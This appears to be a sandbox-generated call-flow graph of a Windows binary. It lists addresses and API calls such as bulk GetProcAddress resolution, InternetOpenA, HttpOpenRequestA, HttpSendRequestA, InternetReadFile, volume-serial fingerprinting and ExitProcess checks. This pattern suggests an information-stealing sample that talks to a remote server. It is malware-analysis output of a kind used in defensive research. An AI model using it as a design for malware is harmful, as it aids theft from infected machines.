14251->14252 14253 8a3654 14252->14253 14254 8a45c0 2 API calls 14253->14254 14255 8a366d 14254->14255 14256 8a45c0 2 API calls 14255->14256 14257 8a3686 14256->14257 14258 8a45c0 2 API calls 14257->14258 14259 8a369f 14258->14259 14260 8a45c0 2 API calls 14259->14260 14261 8a36b8 14260->14261 14262 8a45c0 2 API calls 14261->14262 14263 8a36d1 14262->14263 14264 8a45c0 2 API calls 14263->14264 14265 8a36ea 14264->14265 14266 8a45c0 2 API calls 14265->14266 14267 8a3703 14266->14267 14268 8a45c0 2 API calls 14267->14268 14269 8a371c 14268->14269 14270 8a45c0 2 API calls 14269->14270 14271 8a3735 14270->14271 14272 8a45c0 2 API calls 14271->14272 14273 8a374e 14272->14273 14274 8a45c0 2 API calls 14273->14274 14275 8a3767 14274->14275 14276 8a45c0 2 API calls 14275->14276 14277 8a3780 14276->14277 14278 8a45c0 2 API calls 14277->14278 14279 8a3799 14278->14279 14280 8a45c0 2 API calls 14279->14280 14281 8a37b2 14280->14281 14282 8a45c0 2 API calls 14281->14282 14283 8a37cb 14282->14283 14284 8a45c0 2 API calls 14283->14284 14285 8a37e4 14284->14285 14286 8a45c0 2 API calls 14285->14286 14287 8a37fd 14286->14287 14288 8a45c0 2 API calls 14287->14288 14289 8a3816 14288->14289 14290 8a45c0 2 API calls 14289->14290 14291 8a382f 14290->14291 14292 8a45c0 2 API calls 14291->14292 14293 8a3848 14292->14293 14294 8a45c0 2 API calls 14293->14294 14295 8a3861 14294->14295 14296 8a45c0 2 API calls 14295->14296 14297 8a387a 14296->14297 14298 8a45c0 2 API calls 14297->14298 14299 8a3893 14298->14299 14300 8a45c0 2 API calls 14299->14300 14301 8a38ac 14300->14301 14302 8a45c0 2 API calls 14301->14302 14303 8a38c5 14302->14303 14304 8a45c0 2 API calls 14303->14304 14305 8a38de 14304->14305 14306 8a45c0 2 API calls 14305->14306 14307 8a38f7 14306->14307 14308 8a45c0 2 API calls 14307->14308 14309 8a3910 14308->14309 14310 8a45c0 2 API calls 14309->14310 14311 8a3929 14310->14311 14312 8a45c0 2 API calls 14311->14312 14313 8a3942 14312->14313 14314 8a45c0 2 API calls 14313->14314 14315 8a395b 14314->14315 14316 8a45c0 2 API calls 14315->14316 14317 8a3974 14316->14317 14318 8a45c0 2 API calls 14317->14318 14319 8a398d 14318->14319 14320 8a45c0 2 API calls 14319->14320 14321 8a39a6 14320->14321 14322 8a45c0 2 API calls 14321->14322 14323 8a39bf 14322->14323 14324 8a45c0 2 API calls 14323->14324 14325 8a39d8 14324->14325 14326 8a45c0 2 API calls 14325->14326 14327 8a39f1 14326->14327 14328 8a45c0 2 API calls 14327->14328 14329 8a3a0a 14328->14329 14330 8a45c0 2 API calls 14329->14330 14331 8a3a23 14330->14331 14332 8a45c0 2 API calls 14331->14332 14333 8a3a3c 14332->14333 14334 8a45c0 2 API calls 14333->14334 14335 8a3a55 14334->14335 14336 8a45c0 2 API calls 14335->14336 14337 8a3a6e 14336->14337 14338 8a45c0 2 API calls 14337->14338 14339 8a3a87 14338->14339 14340 8a45c0 2 API calls 14339->14340 14341 8a3aa0 14340->14341 14342 8a45c0 2 API calls 14341->14342 14343 8a3ab9 14342->14343 14344 8a45c0 2 API calls 14343->14344 14345 8a3ad2 14344->14345 14346 8a45c0 2 API calls 14345->14346 14347 8a3aeb 14346->14347 14348 8a45c0 2 API calls 14347->14348 14349 8a3b04 14348->14349 14350 8a45c0 2 API calls 14349->14350 14351 8a3b1d 14350->14351 14352 8a45c0 2 API calls 14351->14352 14353 8a3b36 14352->14353 14354 8a45c0 2 API calls 14353->14354 14355 8a3b4f 14354->14355 14356 8a45c0 2 API calls 14355->14356 14357 8a3b68 14356->14357 14358 8a45c0 2 API calls 14357->14358 14359 8a3b81 14358->14359 14360 8a45c0 2 API calls 14359->14360 14361 8a3b9a 14360->14361 14362 8a45c0 2 API calls 14361->14362 14363 8a3bb3 14362->14363 14364 8a45c0 2 API calls 14363->14364 14365 8a3bcc 14364->14365 14366 8a45c0 2 API calls 14365->14366 14367 8a3be5 14366->14367 14368 8a45c0 2 API calls 14367->14368 14369 8a3bfe 14368->14369 14370 8a45c0 2 API calls 14369->14370 14371 8a3c17 14370->14371 14372 8a45c0 2 API calls 14371->14372 14373 8a3c30 14372->14373 14374 8a45c0 2 API calls 14373->14374 14375 8a3c49 14374->14375 14376 8a45c0 2 API calls 14375->14376 14377 8a3c62 14376->14377 14378 8a45c0 2 API calls 14377->14378 14379 8a3c7b 14378->14379 14380 8a45c0 2 API calls 14379->14380 14381 8a3c94 14380->14381 14382 8a45c0 2 API calls 14381->14382 14383 8a3cad 14382->14383 14384 8a45c0 2 API calls 14383->14384 14385 8a3cc6 14384->14385 14386 8a45c0 2 API calls 14385->14386 14387 8a3cdf 14386->14387 14388 8a45c0 2 API calls 14387->14388 14389 8a3cf8 14388->14389 14390 8a45c0 2 API calls 14389->14390 14391 8a3d11 14390->14391 14392 8a45c0 2 API calls 14391->14392 14393 8a3d2a 14392->14393 14394 8a45c0 2 API calls 14393->14394 14395 8a3d43 14394->14395 14396 8a45c0 2 API calls 14395->14396 14397 8a3d5c 14396->14397 14398 8a45c0 2 API calls 14397->14398 14399 8a3d75 14398->14399 14400 8a45c0 2 API calls 14399->14400 14401 8a3d8e 14400->14401 14402 8a45c0 2 API calls 14401->14402 14403 8a3da7 14402->14403 14404 8a45c0 2 API calls 14403->14404 14405 8a3dc0 14404->14405 14406 8a45c0 2 API calls 14405->14406 14407 8a3dd9 14406->14407 14408 8a45c0 2 API calls 14407->14408 14409 8a3df2 14408->14409 14410 8a45c0 2 API calls 14409->14410 14411 8a3e0b 14410->14411 14412 8a45c0 2 API calls 14411->14412 14413 8a3e24 14412->14413 14414 8a45c0 2 API calls 14413->14414 14415 8a3e3d 14414->14415 14416 8a45c0 2 API calls 14415->14416 14417 8a3e56 14416->14417 14418 8a45c0 2 API calls 14417->14418 14419 8a3e6f 14418->14419 14420 8a45c0 2 API calls 14419->14420 14421 8a3e88 14420->14421 14422 8a45c0 2 API calls 14421->14422 14423 8a3ea1 14422->14423 14424 8a45c0 2 API calls 14423->14424 14425 8a3eba 14424->14425 14426 8a45c0 2 API calls 14425->14426 14427 8a3ed3 14426->14427 14428 8a45c0 2 API calls 14427->14428 14429 8a3eec 14428->14429 14430 8a45c0 2 API calls 14429->14430 14431 8a3f05 14430->14431 14432 8a45c0 2 API calls 14431->14432 14433 8a3f1e 14432->14433 14434 8a45c0 2 API calls 14433->14434 14435 8a3f37 14434->14435 14436 8a45c0 2 API calls 14435->14436 14437 8a3f50 14436->14437 14438 8a45c0 2 API calls 14437->14438 14439 8a3f69 14438->14439 14440 8a45c0 2 API calls 14439->14440 14441 8a3f82 14440->14441 14442 8a45c0 2 API calls 14441->14442 14443 8a3f9b 14442->14443 14444 8a45c0 2 API calls 14443->14444 14445 8a3fb4 14444->14445 14446 8a45c0 2 API calls 14445->14446 14447 8a3fcd 14446->14447 14448 8a45c0 2 API calls 14447->14448 14449 8a3fe6 14448->14449 14450 8a45c0 2 API calls 14449->14450 14451 8a3fff 14450->14451 14452 8a45c0 2 API calls 14451->14452 14453 8a4018 14452->14453 14454 8a45c0 2 API calls 14453->14454 14455 8a4031 14454->14455 14456 8a45c0 2 API calls 14455->14456 14457 8a404a 14456->14457 14458 8a45c0 2 API calls 14457->14458 14459 8a4063 14458->14459 14460 8a45c0 2 API calls 14459->14460 14461 8a407c 14460->14461 14462 8a45c0 2 API calls 14461->14462 14463 8a4095 14462->14463 14464 8a45c0 2 API calls 14463->14464 14465 8a40ae 14464->14465 14466 8a45c0 2 API calls 14465->14466 14467 8a40c7 14466->14467 14468 8a45c0 2 API calls 14467->14468 14469 8a40e0 14468->14469 14470 8a45c0 2 API calls 14469->14470 14471 8a40f9 14470->14471 14472 8a45c0 2 API calls 14471->14472 14473 8a4112 14472->14473 14474 8a45c0 2 API calls 14473->14474 14475 8a412b 14474->14475 14476 8a45c0 2 API calls 14475->14476 14477 8a4144 14476->14477 14478 8a45c0 2 API calls 14477->14478 14479 8a415d 14478->14479 14480 8a45c0 2 API calls 14479->14480 14481 8a4176 14480->14481 14482 8a45c0 2 API calls 14481->14482 14483 8a418f 14482->14483 14484 8a45c0 2 API calls 14483->14484 14485 8a41a8 14484->14485 14486 8a45c0 2 API calls 14485->14486 14487 8a41c1 14486->14487 14488 8a45c0 2 API calls 14487->14488 14489 8a41da 14488->14489 14490 8a45c0 2 API calls 14489->14490 14491 8a41f3 14490->14491 14492 8a45c0 2 API calls 14491->14492 14493 8a420c 14492->14493 14494 8a45c0 2 API calls 14493->14494 14495 8a4225 14494->14495 14496 8a45c0 2 API calls 14495->14496 14497 8a423e 14496->14497 14498 8a45c0 2 API calls 14497->14498 14499 8a4257 14498->14499 14500 8a45c0 2 API calls 14499->14500 14501 8a4270 14500->14501 14502 8a45c0 2 API calls 14501->14502 14503 8a4289 14502->14503 14504 8a45c0 2 API calls 14503->14504 14505 8a42a2 14504->14505 14506 8a45c0 2 API calls 14505->14506 14507 8a42bb 14506->14507 14508 8a45c0 2 API calls 14507->14508 14509 8a42d4 14508->14509 14510 8a45c0 2 API calls 14509->14510 14511 8a42ed 14510->14511 14512 8a45c0 2 API calls 14511->14512 14513 8a4306 14512->14513 14514 8a45c0 2 API calls 14513->14514 14515 8a431f 14514->14515 14516 8a45c0 2 API calls 14515->14516 14517 8a4338 14516->14517 14518 8a45c0 2 API calls 14517->14518 14519 8a4351 14518->14519 14520 8a45c0 2 API calls 14519->14520 14521 8a436a 14520->14521 14522 8a45c0 2 API calls 14521->14522 14523 8a4383 14522->14523 14524 8a45c0 2 API calls 14523->14524 14525 8a439c 14524->14525 14526 8a45c0 2 API calls 14525->14526 14527 8a43b5 14526->14527 14528 8a45c0 2 API calls 14527->14528 14529 8a43ce 14528->14529 14530 8a45c0 2 API calls 14529->14530 14531 8a43e7 14530->14531 14532 8a45c0 2 API calls 14531->14532 14533 8a4400 14532->14533 14534 8a45c0 2 API calls 14533->14534 14535 8a4419 14534->14535 14536 8a45c0 2 API calls 14535->14536 14537 8a4432 14536->14537 14538 8a45c0 2 API calls 14537->14538 14539 8a444b 14538->14539 14540 8a45c0 2 API calls 14539->14540 14541 8a4464 14540->14541 14542 8a45c0 2 API calls 14541->14542 14543 8a447d 14542->14543 14544 8a45c0 2 API calls 14543->14544 14545 8a4496 14544->14545 14546 8a45c0 2 API calls 14545->14546 14547 8a44af 14546->14547 14548 8a45c0 2 API calls 14547->14548 14549 8a44c8 14548->14549 14550 8a45c0 2 API calls 14549->14550 14551 8a44e1 14550->14551 14552 8a45c0 2 API calls 14551->14552 14553 8a44fa 14552->14553 14554 8a45c0 2 API calls 14553->14554 14555 8a4513 14554->14555 14556 8a45c0 2 API calls 14555->14556 14557 8a452c 14556->14557 14558 8a45c0 2 API calls 14557->14558 14559 8a4545 14558->14559 14560 8a45c0 2 API calls 14559->14560 14561 8a455e 14560->14561 14562 8a45c0 2 API calls 14561->14562 14563 8a4577 14562->14563 14564 8a45c0 2 API calls 14563->14564 14565 8a4590 14564->14565 14566 8a45c0 2 API calls 14565->14566 14567 8a45a9 14566->14567 14568 8b9c10 14567->14568 14569 8b9c20 43 API calls 14568->14569 14570 8ba036 8 API calls 14568->14570 14569->14570 14571 8ba0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14570->14571 14572 8ba146 14570->14572 14571->14572 14573 8ba153 8 API calls 14572->14573 14574 8ba216 14572->14574 14573->14574 14575 8ba298 14574->14575 14576 8ba21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14574->14576 14577 8ba337 14575->14577 14578 8ba2a5 6 API calls 14575->14578 14576->14575 14579 8ba41f 14577->14579 14580 8ba344 9 API calls 14577->14580 14578->14577 14581 8ba428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14579->14581 14582 8ba4a2 14579->14582 14580->14579 14581->14582 14583 8ba4ab GetProcAddress GetProcAddress 14582->14583 14584 8ba4dc 14582->14584 14583->14584 14585 8ba515 14584->14585 14586 8ba4e5 GetProcAddress GetProcAddress 14584->14586 14587 8ba612 14585->14587 14588 8ba522 10 API calls 14585->14588 14586->14585 14589 8ba61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14587->14589 14590 8ba67d 14587->14590 14588->14587 14589->14590 14591 8ba69e 14590->14591 14592 8ba686 GetProcAddress 14590->14592 14593 8b5ca3 14591->14593 14594 8ba6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14591->14594 14592->14591 14595 8a1590 14593->14595 14594->14593 15716 8a1670 14595->15716 14598 8ba7a0 lstrcpy 14599 8a15b5 14598->14599 14600 8ba7a0 lstrcpy 14599->14600 14601 8a15c7 14600->14601 14602 8ba7a0 lstrcpy 14601->14602 14603 8a15d9 14602->14603 14604 8ba7a0 lstrcpy 14603->14604 14605 8a1663 14604->14605 14606 8b5510 14605->14606 14607 8b5521 14606->14607 14608 8ba820 2 API calls 14607->14608 14609 8b552e 14608->14609 14610 8ba820 2 API calls 14609->14610 14611 8b553b 14610->14611 14612 8ba820 2 API calls 14611->14612 14613 8b5548 14612->14613 14614 8ba740 lstrcpy 14613->14614 14615 8b5555 14614->14615 14616 8ba740 lstrcpy 14615->14616 14617 8b5562 14616->14617 14618 8ba740 lstrcpy 14617->14618 14619 8b556f 14618->14619 14620 8ba740 lstrcpy 14619->14620 14630 8b557c 14620->14630 14621 8b5643 StrCmpCA 14621->14630 14622 8b56a0 StrCmpCA 14623 8b57dc 14622->14623 14622->14630 14624 8ba8a0 lstrcpy 14623->14624 14626 8b57e8 14624->14626 14625 8a1590 lstrcpy 14625->14630 14629 8ba820 2 API calls 14626->14629 14627 8ba740 lstrcpy 14627->14630 14628 8ba820 lstrlen lstrcpy 14628->14630 14632 8b57f6 14629->14632 14630->14621 14630->14622 14630->14625 14630->14627 14630->14628 14631 8b5856 StrCmpCA 14630->14631 14634 8ba7a0 lstrcpy 14630->14634 14641 8b5a0b StrCmpCA 14630->14641 14652 8b52c0 25 API calls 14630->14652 14655 8b578a StrCmpCA 14630->14655 14657 8b593f StrCmpCA 14630->14657 14659 8b51f0 20 API calls 14630->14659 14660 8ba8a0 lstrcpy 14630->14660 14631->14630 14633 8b5991 14631->14633 14635 8ba820 2 API calls 14632->14635 14636 8ba8a0 lstrcpy 14633->14636 14634->14630 14637 8b5805 14635->14637 14639 8b599d 14636->14639 14638 8a1670 lstrcpy 14637->14638 14658 8b5811 14638->14658 14640 8ba820 2 API calls 14639->14640 14642 8b59ab 14640->14642 14643 8b5a28 14641->14643 14644 8b5a16 Sleep 14641->14644 14645 8ba820 2 API calls 14642->14645 14647 8ba8a0 lstrcpy 14643->14647 14644->14630 14646 8b59ba 14645->14646 14648 8a1670 lstrcpy 14646->14648 14649 8b5a34 14647->14649 14648->14658 14650 8ba820 2 API calls 14649->14650 14651 8b5a43 14650->14651 14653 8ba820 2 API calls 14651->14653 14652->14630 14654 8b5a52 14653->14654 14656 8a1670 lstrcpy 14654->14656 14655->14630 14656->14658 14657->14630 14658->13713 14659->14630 14660->14630 14662 8b754c 14661->14662 14663 8b7553 GetVolumeInformationA 14661->14663 14662->14663 14667 8b7591 14663->14667 14664 8b75fc GetProcessHeap RtlAllocateHeap 14665 8b7619 14664->14665 14666 8b7628 wsprintfA 14664->14666 14668 8ba740 lstrcpy 14665->14668 14669 8ba740 lstrcpy 14666->14669 14667->14664 14670 8b5da7 14668->14670 14669->14670 14670->13734 14672 8ba7a0 lstrcpy 14671->14672 14673 8a4899 14672->14673 15725 8a47b0 14673->15725 14675 8a48a5 14676 8ba740 lstrcpy 14675->14676 14677 8a48d7 14676->14677 14678 8ba740 lstrcpy 14677->14678 14679 8a48e4 14678->14679 14680 8ba740 lstrcpy 14679->14680 14681 8a48f1 14680->14681 14682 8ba740 lstrcpy 14681->14682 14683 8a48fe 14682->14683 14684 8ba740 lstrcpy 14683->14684 14685 8a490b InternetOpenA StrCmpCA 14684->14685 14686 8a4944 14685->14686 14687 8a4ecb InternetCloseHandle 14686->14687 15731 8b8b60 14686->15731 14689 8a4ee8 14687->14689 15746 8a9ac0 CryptStringToBinaryA 14689->15746 14690 8a4963 15739 8ba920 14690->15739 14693 8a4976 14695 8ba8a0 lstrcpy 14693->14695 14701 8a497f 14695->14701 14696 8ba820 2 API calls 14697 8a4f05 14696->14697 14699 8ba9b0 4 API calls 14697->14699 14698 8a4f27 codecvt 14703 8ba7a0 lstrcpy 14698->14703 14700 8a4f1b 14699->14700 14702 8ba8a0 lstrcpy 14700->14702 14704 8ba9b0 4 API calls 14701->14704 14702->14698 14715 8a4f57 14703->14715 14705 8a49a9 14704->14705 14706 8ba8a0 lstrcpy 14705->14706 14707 8a49b2 14706->14707 14708 8ba9b0 4 API calls 14707->14708 14709 8a49d1 14708->14709 14710 8ba8a0 lstrcpy 14709->14710 14711 8a49da 14710->14711 14712 8ba920 3 API calls 14711->14712 14713 8a49f8 14712->14713 14714 8ba8a0 lstrcpy 14713->14714 14716 8a4a01 14714->14716 14715->13737 14717 8ba9b0 4 API calls 14716->14717 14718 8a4a20 14717->14718 14719 8ba8a0 lstrcpy 14718->14719 14720 8a4a29 14719->14720 14721 8ba9b0 4 API calls 14720->14721 14722 8a4a48 14721->14722 14723 8ba8a0 lstrcpy 14722->14723 14724 8a4a51 14723->14724 14725 8ba9b0 4 API calls 14724->14725 14726 8a4a7d 14725->14726 14727 8ba920 3 API calls 14726->14727 14728 8a4a84 14727->14728 14729 8ba8a0 lstrcpy 14728->14729 14730 8a4a8d 14729->14730 14731 8a4aa3 InternetConnectA 14730->14731 14731->14687 14732 8a4ad3 HttpOpenRequestA 14731->14732 14734 8a4b28 14732->14734 14735 8a4ebe InternetCloseHandle 14732->14735 14736 8ba9b0 4 API calls 14734->14736 14735->14687 14737 8a4b3c 14736->14737 14738 8ba8a0 lstrcpy 14737->14738 14739 8a4b45 14738->14739 14740 8ba920 3 API calls 14739->14740 14741 8a4b63 14740->14741 14742 8ba8a0 lstrcpy 14741->14742 14743 8a4b6c 14742->14743 14744 8ba9b0 4 API calls 14743->14744 14745 8a4b8b 14744->14745 14746 8ba8a0 lstrcpy 14745->14746 14747 8a4b94 14746->14747 14748 8ba9b0 4 API calls 14747->14748 14749 8a4bb5 14748->14749 14750 8ba8a0 lstrcpy 14749->14750 14751 8a4bbe 14750->14751 14752 8ba9b0 4 API calls 14751->14752 14753 8a4bde 14752->14753 14754 8ba8a0 lstrcpy 14753->14754 14755 8a4be7 14754->14755 14756 8ba9b0 4 API calls 14755->14756 14757 8a4c06 14756->14757 14758 8ba8a0 lstrcpy 14757->14758 14759 8a4c0f 14758->14759 14760 8ba920 3 API calls 14759->14760 14761 8a4c2d 14760->14761 14762 8ba8a0 lstrcpy 14761->14762 14763 8a4c36 14762->14763 14764 8ba9b0 4 API calls 14763->14764 14765 8a4c55 14764->14765 14766 8ba8a0 lstrcpy 14765->14766 14767 8a4c5e 14766->14767 14768 8ba9b0 4 API calls 14767->14768 14769 8a4c7d 14768->14769 14770 8ba8a0 lstrcpy 14769->14770 14771 8a4c86 14770->14771 14772 8ba920 3 API calls 14771->14772 14773 8a4ca4 14772->14773 14774 8ba8a0 lstrcpy 14773->14774 14775 8a4cad 14774->14775 14776 8ba9b0 4 API calls 14775->14776 14777 8a4ccc 14776->14777 14778 8ba8a0 lstrcpy 14777->14778 14779 8a4cd5 14778->14779 14780 8ba9b0 4 API calls 14779->14780 14781 8a4cf6 14780->14781 14782 8ba8a0 lstrcpy 14781->14782 14783 8a4cff 14782->14783 14784 8ba9b0 4 API calls 14783->14784 14785 8a4d1f 14784->14785 14786 8ba8a0 lstrcpy 14785->14786 14787 8a4d28 14786->14787 14788 8ba9b0 4 API calls 14787->14788 14789 8a4d47 14788->14789 14790 8ba8a0 lstrcpy 14789->14790 14791 8a4d50 14790->14791 14792 8ba920 3 API calls 14791->14792 14793 8a4d6e 14792->14793 14794 8ba8a0 lstrcpy 14793->14794 14795 8a4d77 14794->14795 14796 8ba740 lstrcpy 14795->14796 14797 8a4d92 14796->14797 14798 8ba920 3 API calls 14797->14798 14799 8a4db3 14798->14799 14800 8ba920 3 API calls 14799->14800 14801 8a4dba 14800->14801 14802 8ba8a0 lstrcpy 14801->14802 14803 8a4dc6 14802->14803 14804 8a4de7 lstrlen 14803->14804 14805 8a4dfa 14804->14805 14806 8a4e03 lstrlen 14805->14806 15745 8baad0 14806->15745 14808 8a4e13 HttpSendRequestA 14809 8a4e32 InternetReadFile 14808->14809 14810 8a4e67 InternetCloseHandle 14809->14810 14815 8a4e5e 14809->14815 14812 8ba800 14810->14812 14812->14735 14813 8ba9b0 4 API calls 14813->14815 14814 8ba8a0 lstrcpy 14814->14815 14815->14809 14815->14810 14815->14813 14815->14814 15752 8baad0 14816->15752 14818 8b17c4 StrCmpCA 14819 8b17cf ExitProcess 14818->14819 14830 8b17d7 14818->14830 14820 8b19c2 14820->13739 14821 8b18cf StrCmpCA 14821->14830 14822 8b18ad StrCmpCA 14822->14830 14823 8b187f StrCmpCA 14823->14830 14824 8b185d StrCmpCA 14824->14830 14825 8b1913 StrCmpCA 14825->14830 14826 8b1932 StrCmpCA 14826->14830 14827 8b18f1 StrCmpCA 14827->14830 14828 8b1951 StrCmpCA 14828->14830 14829 8b1970 StrCmpCA 14829->14830 14830->14820 14830->14821 14830->14822 14830->14823 14830->14824 14830->14825 14830->14826 14830->14827 14830->14828 14830->14829 14831 8ba820 lstrlen lstrcpy 14830->14831 14831->14830 14833 8ba7a0 lstrcpy 14832->14833 14834 8a5979 14833->14834 14835 8a47b0 2 API calls 14834->14835 14836 8a5985 14835->14836 14837 8ba740 lstrcpy 14836->14837 14838 8a59ba 14837->14838 14839 8ba740 lstrcpy 14838->14839 14840 8a59c7 14839->14840 14841 8ba740 lstrcpy 14840->14841 14842 8a59d4 14841->14842 14843 8ba740 lstrcpy 14842->14843 14844 8a59e1 14843->14844 14845 8ba740 lstrcpy 14844->14845 14846 8a59ee InternetOpenA StrCmpCA 14845->14846 14847 8a5a1d 14846->14847 14848 8a5fc3 InternetCloseHandle 14847->14848 14849 8b8b60 3 API calls 14847->14849 14850 8a5fe0 14848->14850 14851 8a5a3c 14849->14851 14853 8a9ac0 4 API calls 14850->14853 14852 8ba920 3 API calls 14851->14852 14854 8a5a4f 14852->14854 14855 8a5fe6 14853->14855 14856 8ba8a0 lstrcpy 14854->14856 14857 8ba820 2 API calls 14855->14857 14859 8a601f codecvt 14855->14859 14861 8a5a58 14856->14861 14858 8a5ffd 14857->14858 14860 8ba9b0 4 API calls 14858->14860 14863 8ba7a0 lstrcpy 14859->14863 14862 8a6013 14860->14862 14865 8ba9b0 4 API calls 14861->14865 14864 8ba8a0 lstrcpy 14862->14864 14873 8a604f 14863->14873 14864->14859 14866 8a5a82 14865->14866 14867 8ba8a0 lstrcpy 14866->14867 14868 8a5a8b 14867->14868 14869 8ba9b0 4 API calls 14868->14869 14870 8a5aaa 14869->14870 14871 8ba8a0 lstrcpy 14870->14871 14872 8a5ab3 14871->14872 14874 8ba920 3 API calls 14872->14874 14873->13745 14875 8a5ad1 14874->14875 14876 8ba8a0 lstrcpy 14875->14876 14877 8a5ada 14876->14877 14878 8ba9b0 4 API calls 14877->14878 14879 8a5af9 14878->14879 14880 8ba8a0 lstrcpy 14879->14880 14881 8a5b02 14880->14881 14882 8ba9b0 4 API calls 14881->14882 14883 8a5b21 14882->14883 14884 8ba8a0 lstrcpy 14883->14884 14885 8a5b2a 14884->14885 14886 8ba9b0 4 API calls 14885->14886 14887 8a5b56 14886->14887 14888 8ba920 3 API calls 14887->14888 14889 8a5b5d 14888->14889 14890 8ba8a0 lstrcpy 14889->14890 14891 8a5b66 14890->14891 14892 8a5b7c InternetConnectA 14891->14892 14892->14848 14893 8a5bac HttpOpenRequestA 14892->14893 14895 8a5c0b 14893->14895 14896 8a5fb6 InternetCloseHandle 14893->14896 14897 8ba9b0 4 API calls 14895->14897 14896->14848 14898 8a5c1f 14897->14898 14899 8ba8a0 lstrcpy 14898->14899 14900 8a5c28 14899->14900 14901 8ba920 3 API calls 14900->14901 14902 8a5c46 14901->14902 14903 8ba8a0 lstrcpy 14902->14903 14904 8a5c4f 14903->14904 14905 8ba9b0 4 API calls 14904->14905 14906 8a5c6e 14905->14906 14907 8ba8a0 lstrcpy 14906->14907 14908 8a5c77 14907->14908 14909 8ba9b0 4 API calls 14908->14909 14910 8a5c98 14909->14910 14911 8ba8a0 lstrcpy 14910->14911 14912 8a5ca1 14911->14912 14913 8ba9b0 4 API calls 14912->14913 14914 8a5cc1 14913->14914 14915 8ba8a0 lstrcpy 14914->14915 14916 8a5cca 14915->14916 14917 8ba9b0 4 API calls 14916->14917 14918 8a5ce9 14917->14918 14919 8ba8a0 lstrcpy 14918->14919 14920 8a5cf2 14919->14920 14921 8ba920 3 API calls 14920->14921 14922 8a5d10 14921->14922 14923 8ba8a0 lstrcpy 14922->14923 14924 8a5d19 14923->14924 14925 8ba9b0 4 API calls 14924->14925 14926 8a5d38 14925->14926 14927 8ba8a0 lstrcpy 14926->14927 14928 8a5d41 14927->14928 14929 8ba9b0 4 API calls 14928->14929 14930 8a5d60 14929->14930 14931 8ba8a0 lstrcpy 14930->14931 14932 8a5d69 14931->14932 14933 8ba920 3 API calls 14932->14933 14934 8a5d87 14933->14934 14935 8ba8a0 lstrcpy 14934->14935 14936 8a5d90 14935->14936 14937 8ba9b0 4 API calls 14936->14937 14938 8a5daf 14937->14938 14939 8ba8a0 lstrcpy 14938->14939 14940 8a5db8 14939->14940 14941 8ba9b0 4 API calls 14940->14941 14942 8a5dd9 14941->14942 14943 8ba8a0 lstrcpy 14942->14943 14944 8a5de2 14943->14944 14945 8ba9b0 4 API calls 14944->14945 14946 8a5e02 14945->14946 14947 8ba8a0 lstrcpy 14946->14947 14948 8a5e0b 14947->14948 14949 8ba9b0 4 API calls 14948->14949 14950 8a5e2a 14949->14950 14951 8ba8a0 lstrcpy 14950->14951 14952 8a5e33 14951->14952 14953 8ba920 3 API calls 14952->14953 14954 8a5e54 14953->14954 14955 8ba8a0 lstrcpy 14954->14955 14956 8a5e5d 14955->14956 14957 8a5e70 lstrlen 14956->14957 15753 8baad0 14957->15753 14959 8a5e81 lstrlen GetProcessHeap RtlAllocateHeap 15754 8baad0 14959->15754 14961 8a5eae lstrlen 14962 8a5ebe 14961->14962 14963 8a5ed7 lstrlen 14962->14963 14964 8a5ee7 14963->14964 14965 8a5ef0 lstrlen 14964->14965 14966 8a5f04 14965->14966 14967 8a5f1a lstrlen 14966->14967 15755 8baad0 14967->15755 14969 8a5f2a HttpSendRequestA 14970 8a5f35 InternetReadFile 14969->14970 14971 8a5f6a InternetCloseHandle 14970->14971 14975 8a5f61 14970->14975 14971->14896 14973 8ba9b0 4 API calls 14973->14975 14974 8ba8a0 lstrcpy 14974->14975 14975->14970 14975->14971 14975->14973 14975->14974 14978 8b1077 14976->14978 14977 8b1151 14977->13747 14978->14977 14979 8ba820 lstrlen lstrcpy 14978->14979 14979->14978 14981 8b0db7 14980->14981 14982 8b0f17 14981->14982 14983 8b0e27 StrCmpCA 14981->14983 14984 8b0e67 StrCmpCA 14981->14984 14985 8b0ea4 StrCmpCA 14981->14985 14986 8ba820 lstrlen lstrcpy 14981->14986 14982->13755 14983->14981 14984->14981 14985->14981 14986->14981 14989 8b0f67 14987->14989 14988 8b1044 14988->13763 14989->14988 14990 8b0fb2 StrCmpCA 14989->14990 14991 8ba820 lstrlen lstrcpy 14989->14991 14990->14989 14991->14989 14993 8ba740 lstrcpy 14992->14993 14994 8b1a26 14993->14994 14995 8ba9b0 4 API calls 14994->14995 14996 8b1a37 14995->14996 14997 8ba8a0 lstrcpy 14996->14997 14998 8b1a40 14997->14998 14999 8ba9b0 4 API calls 14998->14999 15000 8b1a5b 14999->15000 15001 8ba8a0 lstrcpy 15000->15001 15002 8b1a64 15001->15002 15003 8ba9b0 4 API calls 15002->15003 15004 8b1a7d 15003->15004 15005 8ba8a0 lstrcpy 15004->15005 15006 8b1a86 15005->15006 15007 8ba9b0 4 API calls 15006->15007 15008 8b1aa1 15007->15008 15009 8ba8a0 lstrcpy 15008->15009 15010 8b1aaa 15009->15010 15011 8ba9b0 4 API calls 15010->15011 15012 8b1ac3 15011->15012 15013 8ba8a0 lstrcpy 15012->15013 15014 8b1acc 15013->15014 15015 8ba9b0 4 API calls 15014->15015 15016 8b1ae7 15015->15016 15017 8ba8a0 lstrcpy 15016->15017 15018 8b1af0 15017->15018 15019 8ba9b0 4 API calls 15018->15019 15020 8b1b09 15019->15020 15021 8ba8a0 lstrcpy 15020->15021 15022 8b1b12 15021->15022 15023 8ba9b0 4 API calls 15022->15023 15024 8b1b2d 15023->15024 15025 8ba8a0 lstrcpy 15024->15025 15026 8b1b36 15025->15026 15027 8ba9b0 4 API calls 15026->15027 15028 8b1b4f 15027->15028 15029 8ba8a0 lstrcpy 15028->15029 15030 8b1b58 15029->15030 15031 8ba9b0 4 API calls 15030->15031 15032 8b1b76 15031->15032 15033 8ba8a0 lstrcpy 15032->15033 15034 8b1b7f 15033->15034 15035 8b7500 6 API calls 15034->15035 15036 8b1b96 15035->15036 15037 8ba920 3 API calls 15036->15037 15038 8b1ba9 15037->15038 15039 8ba8a0 lstrcpy 15038->15039 15040 8b1bb2 15039->15040 15041 8ba9b0 4 API calls 15040->15041 15042 8b1bdc 15041->15042 15043 8ba8a0 lstrcpy 15042->15043 15044 8b1be5 15043->15044 15045 8ba9b0 4 API calls 15044->15045 15046 8b1c05 15045->15046 15047 8ba8a0 lstrcpy 15046->15047 15048 8b1c0e 